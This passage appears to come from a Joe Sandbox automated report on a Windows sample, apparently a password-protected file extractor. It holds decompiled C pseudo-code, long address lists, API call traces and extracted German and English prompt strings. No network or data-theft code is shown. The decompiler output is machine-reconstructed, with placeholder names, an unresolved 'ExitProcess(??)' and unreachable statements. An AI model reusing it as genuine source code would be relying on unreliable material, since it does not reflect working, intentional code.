                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_push(E00405066());
                                                                                                                                                  											__eflags = 4 -  *_t333;
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												L34:
                                                                                                                                                  												continue;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t181 =  *0x40b3b0; // 0x0
                                                                                                                                                  												E004045FC(__eflags, 2, _t181);
                                                                                                                                                  												_t312 = _t181;
                                                                                                                                                  												E004030F0(0x40b194, _t312);
                                                                                                                                                  												E00404925(_t330, __eflags, 0);
                                                                                                                                                  												_t333 = _t333 + 8;
                                                                                                                                                  												L35:
                                                                                                                                                  												_t167 =  *0x40b3b0; // 0x0
                                                                                                                                                  												_push(_t167);
                                                                                                                                                  												_t168 = E004031F0( *0x40b194);
                                                                                                                                                  												_t169 =  *0x40b194; // 0x0
                                                                                                                                                  												E00406860(__eflags, _t169, _t168, _t167);
                                                                                                                                                  												 *0x40b3b0 =  *0x40b3b0 + 1;
                                                                                                                                                  												_t171 =  *0x40b3b0; // 0x0
                                                                                                                                                  												E00403DE0( *0x40b130,  *0x40b16c);
                                                                                                                                                  												_t310 = _t171;
                                                                                                                                                  												_t247 = _t171;
                                                                                                                                                  												 *0x40b3b0 = _t247;
                                                                                                                                                  												_t239 = _t247 +  *0x40a390;
                                                                                                                                                  												__eflags = _t310 +  *0x40a390;
                                                                                                                                                  												E004074C0(_t247 +  *0x40a390, _t310 +  *0x40a390);
                                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                                  													_t174 = E004020B1( *0x40b174, 0x40a0ca);
                                                                                                                                                  													__eflags = _t174;
                                                                                                                                                  													if(_t174 != 0) {
                                                                                                                                                  														_t177 =  *0x40b130; // 0x40c154
                                                                                                                                                  														 *0x40b198 = _t177;
                                                                                                                                                  													}
                                                                                                                                                  													_push( *0x40b118);
                                                                                                                                                  													_push( *0x40b114);
                                                                                                                                                  													_push( *0x40b110);
                                                                                                                                                  													_push( *0x40b198);
                                                                                                                                                  													_push( *0x40b190);
                                                                                                                                                  													_push( *0x40b18c);
                                                                                                                                                  													_push( *0x40b188);
                                                                                                                                                  													_push( *0x40b194);
                                                                                                                                                  													_push( *0x40b174);
                                                                                                                                                  													E00401D3F();
                                                                                                                                                  													goto L40;
                                                                                                                                                  												} else {
                                                                                                                                                  													_push(0x10);
                                                                                                                                                  													E004036A2( *0x40b13c,  *0x40b148);
                                                                                                                                                  													_push( *0x40b12c);
                                                                                                                                                  													L00403196();
                                                                                                                                                  													ExitProcess(1);
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										goto L62;
                                                                                                                                                  									}
                                                                                                                                                  									_push( *0x40b12c);
                                                                                                                                                  									L00403196();
                                                                                                                                                  									ExitProcess(0);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(0x10);
                                                                                                                                                  					E004036A2( *0x40b13c,  *0x40b15c);
                                                                                                                                                  					ExitProcess(0);
                                                                                                                                                  				}
                                                                                                                                                  				L62:
                                                                                                                                                  				HeapDestroy( *0x40b0f8); // executed
                                                                                                                                                  				ExitProcess(??); // executed
                                                                                                                                                  				E00403B0B();
                                                                                                                                                  				E00403DB0(E00403CC0());
                                                                                                                                                  				E00404150();
                                                                                                                                                  				E00404A13(_t239);
                                                                                                                                                  				return E0040681C(E00406030());
                                                                                                                                                  			}


































































































                                                                                                                                                  0x00401000
                                                                                                                                                  0x00401000
                                                                                                                                                  0x00401000
                                                                                                                                                  0x00401000
                                                                                                                                                  0x00401000
                                                                                                                                                  0x0040100f
                                                                                                                                                  0x00401014
                                                                                                                                                  0x00401021
                                                                                                                                                  0x00401035
                                                                                                                                                  0x0040103a
                                                                                                                                                  0x0040103f
                                                                                                                                                  0x00401044
                                                                                                                                                  0x00401049
                                                                                                                                                  0x0040104e
                                                                                                                                                  0x00401053
                                                                                                                                                  0x00401058
                                                                                                                                                  0x0040105d
                                                                                                                                                  0x00401062
                                                                                                                                                  0x00401067
                                                                                                                                                  0x0040106c
                                                                                                                                                  0x00401071
                                                                                                                                                  0x00401087
                                                                                                                                                  0x0040108c
                                                                                                                                                  0x00401091
                                                                                                                                                  0x0040109b
                                                                                                                                                  0x004010a1
                                                                                                                                                  0x004010b0
                                                                                                                                                  0x004010bf
                                                                                                                                                  0x004010d5
                                                                                                                                                  0x004010e0
                                                                                                                                                  0x004010e5
                                                                                                                                                  0x004010ea
                                                                                                                                                  0x004010f7
                                                                                                                                                  0x00401102
                                                                                                                                                  0x00401103
                                                                                                                                                  0x0040110e
                                                                                                                                                  0x00401113
                                                                                                                                                  0x0040111e
                                                                                                                                                  0x0040111f
                                                                                                                                                  0x00401124
                                                                                                                                                  0x0040120a
                                                                                                                                                  0x0040121a
                                                                                                                                                  0x0040122a
                                                                                                                                                  0x0040123a
                                                                                                                                                  0x0040124a
                                                                                                                                                  0x0040125a
                                                                                                                                                  0x0040126a
                                                                                                                                                  0x0040127a
                                                                                                                                                  0x0040128a
                                                                                                                                                  0x0040129a
                                                                                                                                                  0x004012aa
                                                                                                                                                  0x004012ba
                                                                                                                                                  0x004012c4
                                                                                                                                                  0x004012ca
                                                                                                                                                  0x0040112a
                                                                                                                                                  0x00401135
                                                                                                                                                  0x00401145
                                                                                                                                                  0x00401155
                                                                                                                                                  0x00401165
                                                                                                                                                  0x00401175
                                                                                                                                                  0x00401185
                                                                                                                                                  0x00401195
                                                                                                                                                  0x004011a5
                                                                                                                                                  0x004011b5
                                                                                                                                                  0x004011c5
                                                                                                                                                  0x004011d5
                                                                                                                                                  0x004011e5
                                                                                                                                                  0x004011ef
                                                                                                                                                  0x004011f5
                                                                                                                                                  0x004011f5
                                                                                                                                                  0x004012d9
                                                                                                                                                  0x004012fd
                                                                                                                                                  0x00401307
                                                                                                                                                  0x00401316
                                                                                                                                                  0x0040131b
                                                                                                                                                  0x00401321
                                                                                                                                                  0x00401323
                                                                                                                                                  0x00401325
                                                                                                                                                  0x0040132f
                                                                                                                                                  0x0040132f
                                                                                                                                                  0x00401336
                                                                                                                                                  0x0040133c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040133e
                                                                                                                                                  0x00401344
                                                                                                                                                  0x0040134a
                                                                                                                                                  0x00401354
                                                                                                                                                  0x00401359
                                                                                                                                                  0x00401366
                                                                                                                                                  0x00401371
                                                                                                                                                  0x00401376
                                                                                                                                                  0x0040137c
                                                                                                                                                  0x0040137d
                                                                                                                                                  0x00401382
                                                                                                                                                  0x00401382
                                                                                                                                                  0x0040132f
                                                                                                                                                  0x0040138a
                                                                                                                                                  0x0040139a
                                                                                                                                                  0x0040139c
                                                                                                                                                  0x004013b5
                                                                                                                                                  0x004013c6
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x0040139e
                                                                                                                                                  0x0040139e
                                                                                                                                                  0x004013a3
                                                                                                                                                  0x004013ae
                                                                                                                                                  0x004013e0
                                                                                                                                                  0x004013e5
                                                                                                                                                  0x004013e7
                                                                                                                                                  0x0040140f
                                                                                                                                                  0x00401420
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x004013e9
                                                                                                                                                  0x004013e9
                                                                                                                                                  0x004013ee
                                                                                                                                                  0x004013fc
                                                                                                                                                  0x00401401
                                                                                                                                                  0x00401407
                                                                                                                                                  0x00401408
                                                                                                                                                  0x0040143a
                                                                                                                                                  0x0040143f
                                                                                                                                                  0x00401441
                                                                                                                                                  0x00401463
                                                                                                                                                  0x00401474
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401443
                                                                                                                                                  0x00401443
                                                                                                                                                  0x00401448
                                                                                                                                                  0x0040144d
                                                                                                                                                  0x00401452
                                                                                                                                                  0x00401457
                                                                                                                                                  0x0040145c
                                                                                                                                                  0x0040148e
                                                                                                                                                  0x00401493
                                                                                                                                                  0x00401495
                                                                                                                                                  0x00401497
                                                                                                                                                  0x0040149c
                                                                                                                                                  0x004014a1
                                                                                                                                                  0x004014a6
                                                                                                                                                  0x004014ab
                                                                                                                                                  0x004014b0
                                                                                                                                                  0x004014b0
                                                                                                                                                  0x004014c0
                                                                                                                                                  0x004014c5
                                                                                                                                                  0x004014c7
                                                                                                                                                  0x004014c9
                                                                                                                                                  0x004014ce
                                                                                                                                                  0x004014d3
                                                                                                                                                  0x004014d8
                                                                                                                                                  0x004014dd
                                                                                                                                                  0x004014e2
                                                                                                                                                  0x004014e2
                                                                                                                                                  0x004014f2
                                                                                                                                                  0x004014f7
                                                                                                                                                  0x004014f9
                                                                                                                                                  0x00401756
                                                                                                                                                  0x00401756
                                                                                                                                                  0x0040175b
                                                                                                                                                  0x00401769
                                                                                                                                                  0x00401774
                                                                                                                                                  0x00401775
                                                                                                                                                  0x0040177a
                                                                                                                                                  0x0040177f
                                                                                                                                                  0x0040178d
                                                                                                                                                  0x00401798
                                                                                                                                                  0x00401799
                                                                                                                                                  0x004017a9
                                                                                                                                                  0x004017ae
                                                                                                                                                  0x004017b0
                                                                                                                                                  0x00401a25
                                                                                                                                                  0x00401a25
                                                                                                                                                  0x00401a2b
                                                                                                                                                  0x00401a31
                                                                                                                                                  0x00401a3b
                                                                                                                                                  0x00401a40
                                                                                                                                                  0x00401a46
                                                                                                                                                  0x00401a4b
                                                                                                                                                  0x00401a51
                                                                                                                                                  0x00401a52
                                                                                                                                                  0x00401a57
                                                                                                                                                  0x00401a62
                                                                                                                                                  0x00401a67
                                                                                                                                                  0x00401a69
                                                                                                                                                  0x00401a8d
                                                                                                                                                  0x00401a92
                                                                                                                                                  0x00401a97
                                                                                                                                                  0x00401aa8
                                                                                                                                                  0x00401aad
                                                                                                                                                  0x00401ab3
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401a6b
                                                                                                                                                  0x00401a76
                                                                                                                                                  0x00401a80
                                                                                                                                                  0x00401ac5
                                                                                                                                                  0x00401acb
                                                                                                                                                  0x00401acb
                                                                                                                                                  0x00401acd
                                                                                                                                                  0x00401ad2
                                                                                                                                                  0x00401ad4
                                                                                                                                                  0x00401ada
                                                                                                                                                  0x00401ada
                                                                                                                                                  0x00401adf
                                                                                                                                                  0x00401ae5
                                                                                                                                                  0x00401aeb
                                                                                                                                                  0x00401af1
                                                                                                                                                  0x00401af6
                                                                                                                                                  0x00401afc
                                                                                                                                                  0x00401b01
                                                                                                                                                  0x00401b07
                                                                                                                                                  0x00401b0d
                                                                                                                                                  0x00401b13
                                                                                                                                                  0x00401b19
                                                                                                                                                  0x00401b1d
                                                                                                                                                  0x00401b22
                                                                                                                                                  0x00401b28
                                                                                                                                                  0x00401b33
                                                                                                                                                  0x00401b3d
                                                                                                                                                  0x00401b3f
                                                                                                                                                  0x00401b4c
                                                                                                                                                  0x00401b51
                                                                                                                                                  0x00401b57
                                                                                                                                                  0x00401b5d
                                                                                                                                                  0x00401b60
                                                                                                                                                  0x00401b65
                                                                                                                                                  0x00401b6b
                                                                                                                                                  0x00401b71
                                                                                                                                                  0x00401b74
                                                                                                                                                  0x00401b79
                                                                                                                                                  0x00401b7f
                                                                                                                                                  0x00401b85
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x004017b6
                                                                                                                                                  0x004017b6
                                                                                                                                                  0x004017bb
                                                                                                                                                  0x004017c2
                                                                                                                                                  0x004017c7
                                                                                                                                                  0x004017cd
                                                                                                                                                  0x004017e0
                                                                                                                                                  0x004017e5
                                                                                                                                                  0x004017e6
                                                                                                                                                  0x004017e7
                                                                                                                                                  0x004017ed
                                                                                                                                                  0x004017f3
                                                                                                                                                  0x004017f9
                                                                                                                                                  0x004017fe
                                                                                                                                                  0x00401812
                                                                                                                                                  0x00401812
                                                                                                                                                  0x00401812
                                                                                                                                                  0x00401800
                                                                                                                                                  0x00401800
                                                                                                                                                  0x00401806
                                                                                                                                                  0x00401809
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040180b
                                                                                                                                                  0x0040180b
                                                                                                                                                  0x0040180b
                                                                                                                                                  0x00401809
                                                                                                                                                  0x00401814
                                                                                                                                                  0x00401816
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040181c
                                                                                                                                                  0x0040181c
                                                                                                                                                  0x00401823
                                                                                                                                                  0x0040182a
                                                                                                                                                  0x0040182f
                                                                                                                                                  0x0040183b
                                                                                                                                                  0x00401841
                                                                                                                                                  0x00401845
                                                                                                                                                  0x00401850
                                                                                                                                                  0x00401851
                                                                                                                                                  0x00401856
                                                                                                                                                  0x0040185c
                                                                                                                                                  0x0040185c
                                                                                                                                                  0x0040185e
                                                                                                                                                  0x00401863
                                                                                                                                                  0x004019c6
                                                                                                                                                  0x004019c6
                                                                                                                                                  0x004019cd
                                                                                                                                                  0x004019da
                                                                                                                                                  0x004019df
                                                                                                                                                  0x004019e5
                                                                                                                                                  0x004019eb
                                                                                                                                                  0x004019ee
                                                                                                                                                  0x004019f3
                                                                                                                                                  0x004019f9
                                                                                                                                                  0x004019ff
                                                                                                                                                  0x00401a02
                                                                                                                                                  0x00401a07
                                                                                                                                                  0x00401a0d
                                                                                                                                                  0x00401a13
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401869
                                                                                                                                                  0x00401869
                                                                                                                                                  0x0040186f
                                                                                                                                                  0x00401875
                                                                                                                                                  0x00401880
                                                                                                                                                  0x00401881
                                                                                                                                                  0x00401886
                                                                                                                                                  0x0040188c
                                                                                                                                                  0x0040188c
                                                                                                                                                  0x0040188e
                                                                                                                                                  0x00401893
                                                                                                                                                  0x00401895
                                                                                                                                                  0x0040189b
                                                                                                                                                  0x0040189b
                                                                                                                                                  0x004018b0
                                                                                                                                                  0x004018b2
                                                                                                                                                  0x00401998
                                                                                                                                                  0x00401998
                                                                                                                                                  0x004019a8
                                                                                                                                                  0x004019aa
                                                                                                                                                  0x004019b7
                                                                                                                                                  0x004019c1
                                                                                                                                                  0x004019c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004018b8
                                                                                                                                                  0x004018bd
                                                                                                                                                  0x004018c2
                                                                                                                                                  0x004018cd
                                                                                                                                                  0x004018d9
                                                                                                                                                  0x004018e3
                                                                                                                                                  0x004018e8
                                                                                                                                                  0x004018ee
                                                                                                                                                  0x004018f8
                                                                                                                                                  0x004018fd
                                                                                                                                                  0x00401903
                                                                                                                                                  0x00401908
                                                                                                                                                  0x00401914
                                                                                                                                                  0x0040191a
                                                                                                                                                  0x0040191e
                                                                                                                                                  0x00401923
                                                                                                                                                  0x00401929
                                                                                                                                                  0x0040192e
                                                                                                                                                  0x00401934
                                                                                                                                                  0x00401937
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401939
                                                                                                                                                  0x00401939
                                                                                                                                                  0x00401940
                                                                                                                                                  0x0040194d
                                                                                                                                                  0x00401952
                                                                                                                                                  0x00401958
                                                                                                                                                  0x0040195e
                                                                                                                                                  0x00401961
                                                                                                                                                  0x00401966
                                                                                                                                                  0x0040196c
                                                                                                                                                  0x00401972
                                                                                                                                                  0x00401975
                                                                                                                                                  0x0040197a
                                                                                                                                                  0x00401980
                                                                                                                                                  0x00401986
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401937
                                                                                                                                                  0x004018b2
                                                                                                                                                  0x00401863
                                                                                                                                                  0x00401816
                                                                                                                                                  0x004014ff
                                                                                                                                                  0x00401523
                                                                                                                                                  0x00401547
                                                                                                                                                  0x0040156f
                                                                                                                                                  0x00401592
                                                                                                                                                  0x004015a6
                                                                                                                                                  0x004015b0
                                                                                                                                                  0x004015b5
                                                                                                                                                  0x004015ba
                                                                                                                                                  0x004015c0
                                                                                                                                                  0x004015c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015e7
                                                                                                                                                  0x004015ea
                                                                                                                                                  0x00401630
                                                                                                                                                  0x00401633
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401635
                                                                                                                                                  0x0040163a
                                                                                                                                                  0x00401640
                                                                                                                                                  0x00401643
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401645
                                                                                                                                                  0x00401645
                                                                                                                                                  0x00401651
                                                                                                                                                  0x0040165c
                                                                                                                                                  0x0040165d
                                                                                                                                                  0x00401667
                                                                                                                                                  0x0040166c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040166c
                                                                                                                                                  0x00401643
                                                                                                                                                  0x004015ec
                                                                                                                                                  0x004015f1
                                                                                                                                                  0x004015f7
                                                                                                                                                  0x004015fa
                                                                                                                                                  0x00401672
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015fc
                                                                                                                                                  0x004015fc
                                                                                                                                                  0x00401608
                                                                                                                                                  0x00401613
                                                                                                                                                  0x00401614
                                                                                                                                                  0x0040161e
                                                                                                                                                  0x00401623
                                                                                                                                                  0x00401678
                                                                                                                                                  0x00401678
                                                                                                                                                  0x0040167d
                                                                                                                                                  0x00401685
                                                                                                                                                  0x0040168b
                                                                                                                                                  0x00401691
                                                                                                                                                  0x00401696
                                                                                                                                                  0x0040169c
                                                                                                                                                  0x004016af
                                                                                                                                                  0x004016b4
                                                                                                                                                  0x004016b5
                                                                                                                                                  0x004016b6
                                                                                                                                                  0x004016bc
                                                                                                                                                  0x004016c2
                                                                                                                                                  0x004016c8
                                                                                                                                                  0x004016cd
                                                                                                                                                  0x00401708
                                                                                                                                                  0x0040170d
                                                                                                                                                  0x0040170f
                                                                                                                                                  0x00401711
                                                                                                                                                  0x00401716
                                                                                                                                                  0x00401716
                                                                                                                                                  0x0040171b
                                                                                                                                                  0x00401721
                                                                                                                                                  0x00401727
                                                                                                                                                  0x0040172d
                                                                                                                                                  0x00401733
                                                                                                                                                  0x00401739
                                                                                                                                                  0x0040173f
                                                                                                                                                  0x00401745
                                                                                                                                                  0x0040174b
                                                                                                                                                  0x00401751
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004016cf
                                                                                                                                                  0x004016cf
                                                                                                                                                  0x004016e0
                                                                                                                                                  0x004016e5
                                                                                                                                                  0x004016eb
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x004016cd
                                                                                                                                                  0x004015fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015ea
                                                                                                                                                  0x004015c5
                                                                                                                                                  0x004015cb
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x004014f9
                                                                                                                                                  0x00401441
                                                                                                                                                  0x004013e7
                                                                                                                                                  0x004012db
                                                                                                                                                  0x004012db
                                                                                                                                                  0x004012ec
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401baf
                                                                                                                                                  0x00401bb4
                                                                                                                                                  0x00401bb9
                                                                                                                                                  0x00401bc3
                                                                                                                                                  0x00401bc8
                                                                                                                                                  0x00401bcd
                                                                                                                                                  0x00401bdc

                                                                                                                                                  APIs
                                                                                                                                                  • memset.MSVCRT ref: 0040100F
                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 0040101C
                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                                                                                                                    • Part of subcall function 00407470: HeapCreate.KERNELBASE(00000001,00001000,00000000), ref: 0040747C
                                                                                                                                                    • Part of subcall function 00407470: RtlAllocateHeap.NTDLL(021D0000,00000001,00004104), ref: 004074AA
                                                                                                                                                    • Part of subcall function 00406807: HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                                                                                                                                    • Part of subcall function 00404AB3: LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                                                                                                                                    • Part of subcall function 00404AB3: LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                                                                                                                                    • Part of subcall function 004040E0: RtlInitializeCriticalSection.NTDLL(0040B40C), ref: 004040EA
                                                                                                                                                    • Part of subcall function 004040E0: GetStockObject.GDI32(00000011), ref: 004040F2
                                                                                                                                                    • Part of subcall function 004040E0: memset.MSVCRT ref: 0040412E
                                                                                                                                                    • Part of subcall function 00403D90: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                                                                                                                                    • Part of subcall function 0040393B: RtlInitializeCriticalSection.NTDLL(0040B3B8), ref: 00403950
                                                                                                                                                    • Part of subcall function 00403694: 6F7EDB20.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                                                                                                                                    • Part of subcall function 00403694: CoInitialize.OLE32(00000000), ref: 0040369B
                                                                                                                                                    • Part of subcall function 00403EF0: RtlAllocateHeap.NTDLL(00000000,0000002C), ref: 00403EFD
                                                                                                                                                    • Part of subcall function 00403060: HeapFree.KERNEL32(00000000,020412B8,00000000,004010A6,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 00403091
                                                                                                                                                    • Part of subcall function 004030A0: RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                                                                                                                                    • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(020E0000,00000008,00000000), ref: 00403DD1
                                                                                                                                                  • GetUserDefaultLangID.KERNEL32(00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010CF
                                                                                                                                                  • VerLanguageNameA.KERNEL32(00000000,00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010D5
                                                                                                                                                  • CharLowerA.USER32(00000000,00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010E0
                                                                                                                                                    • Part of subcall function 00403E30: HeapFree.KERNEL32(020E0000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000), ref: 00401311
                                                                                                                                                    • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                                                                                                                                    • Part of subcall function 00403A18: strncpy.MSVCRT ref: 00403A53
                                                                                                                                                    • Part of subcall function 004036A2: MessageBoxA.USER32(00000000,00000010,00000000,?), ref: 004036BC
                                                                                                                                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                                                                                                                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                                                                                                                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                                                                                                                                  Strings
                                                                                                                                                  • Fortfahren?, xrefs: 0040112A
                                                                                                                                                  • Die Datei , xrefs: 0040118A
                                                                                                                                                  • Continue?, xrefs: 004011FF
                                                                                                                                                  • This program is not supported on this operating system., xrefs: 0040128F
                                                                                                                                                  • 2, xrefs: 004012D6
                                                                                                                                                  • The file , xrefs: 0040125F
                                                                                                                                                  • deutsch, xrefs: 00401119
                                                                                                                                                  • Fehler!, xrefs: 0040113A
                                                                                                                                                  • Overwrite?, xrefs: 0040124F
                                                                                                                                                  • Einige Include Dateien konnten nicht erstellt werden., xrefs: 0040114A
                                                                                                                                                  • Can not allocate the memory., xrefs: 0040122F
                                                                                                                                                  • Choose a location to save the files., xrefs: 0040129F
                                                                                                                                                  • Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet., xrefs: 004011AA
                                                                                                                                                  • Passwort, xrefs: 004011DA
                                                                                                                                                  • \BDFINOPS, xrefs: 00401A36
                                                                                                                                                  • already exists in the current directory. Overwrite?, xrefs: 0040126F
                                                                                                                                                  • An unknown error occured. The program will be terminated., xrefs: 0040127F
                                                                                                                                                  • Bitte whlen Sie einen Ordner zum Speichern der Dateien aus., xrefs: 004011CA
                                                                                                                                                  • Falsches Passwort., xrefs: 0040116A
                                                                                                                                                  • Password, xrefs: 004012AF
                                                                                                                                                  • Error!, xrefs: 0040120F
                                                                                                                                                  • Please enter the password., xrefs: 004012BF
                                                                                                                                                  • Can not create some of your include files., xrefs: 0040121F
                                                                                                                                                  • Bitte geben Sie das Passwort ein., xrefs: 004011EA
                                                                                                                                                  • Wrong password., xrefs: 0040123F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocateCreate$Initialize$CriticalExitFreeHandleLoadModuleProcessSectionmemset$CharCursorDefaultDestroyIconLangLanguageLowerMessageNameObjectStockUserstrlenstrncpy
                                                                                                                                                  • String ID: already exists in the current directory. Overwrite?$2$An unknown error occured. The program will be terminated.$Bitte geben Sie das Passwort ein.$Bitte whlen Sie einen Ordner zum Speichern der Dateien aus.$Can not allocate the memory.$Can not create some of your include files.$Choose a location to save the files.$Continue?$Die Datei $Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.$Einige Include Dateien konnten nicht erstellt werden.$Error!$Falsches Passwort.$Fehler!$Fortfahren?$Overwrite?$Password$Passwort$Please enter the password.$The file $This program is not supported on this operating system.$Wrong password.$\BDFINOPS$deutsch
                                                                                                                                                  • API String ID: 602452764-1834441879
                                                                                                                                                  • Opcode ID: 4d37f5d5bd3a94a3d3a44ba8fef24095b399bba2d0481d1ade3c53a40866be03
                                                                                                                                                  • Instruction ID: 2bde32f427d2b7eddb3ed1bd728a16dca1821eacaa3ecb70a8e4e83947eaff11
                                                                                                                                                  • Opcode Fuzzy Hash: 4d37f5d5bd3a94a3d3a44ba8fef24095b399bba2d0481d1ade3c53a40866be03
                                                                                                                                                  • Instruction Fuzzy Hash: 01423E71250204ABD700BF61EE62E2A3B65FB48349F50403BFA407E2F6DB7959119B9E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E00405EB2(void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				CHAR* _t3;
                                                                                                                                                  				void* _t6;
                                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                                  				long _t9;
                                                                                                                                                  				long _t10;
                                                                                                                                                  				CHAR* _t11;
                                                                                                                                                  				struct HINSTANCE__* _t14;
                                                                                                                                                  
                                                                                                                                                  				_t3 = E00407750(0x104, _a4); // executed
                                                                                                                                                  				_t11 = _t3;
                                                                                                                                                  				_t10 = GetTempPathA(0x104, _t11);
                                                                                                                                                  				_t14 = LoadLibraryA("Kernel32.DLL");
                                                                                                                                                  				if(_t14 != 0) {
                                                                                                                                                  					_t7 = GetProcAddress(_t14, "GetLongPathNameA");
                                                                                                                                                  					if(_t7 != 0) {
                                                                                                                                                  						_t9 =  *_t7(_t11, _t11, 0x104); // executed
                                                                                                                                                  						_t10 = _t9;
                                                                                                                                                  					}
                                                                                                                                                  					FreeLibrary(_t14);
                                                                                                                                                  				}
                                                                                                                                                  				_t6 = E004077F0(0x104 - _t10);
                                                                                                                                                  				_t11[_t10] = 0;
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}










                                                                                                                                                  0x00405ec0
                                                                                                                                                  0x00405ec5
                                                                                                                                                  0x00405ed4
                                                                                                                                                  0x00405edc
                                                                                                                                                  0x00405ee0
                                                                                                                                                  0x00405ee8
                                                                                                                                                  0x00405ef0
                                                                                                                                                  0x00405ef5
                                                                                                                                                  0x00405ef7
                                                                                                                                                  0x00405ef7
                                                                                                                                                  0x00405efa
                                                                                                                                                  0x00405efa
                                                                                                                                                  0x00405f03
                                                                                                                                                  0x00405f08
                                                                                                                                                  0x00405f10

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(021D0000,00000001,021D06F0,000040FF), ref: 00407797
                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000,00000104,004013B3,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                                                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405ED6
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                                                                                                                                  • GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3), ref: 00405EF5
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405EFA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
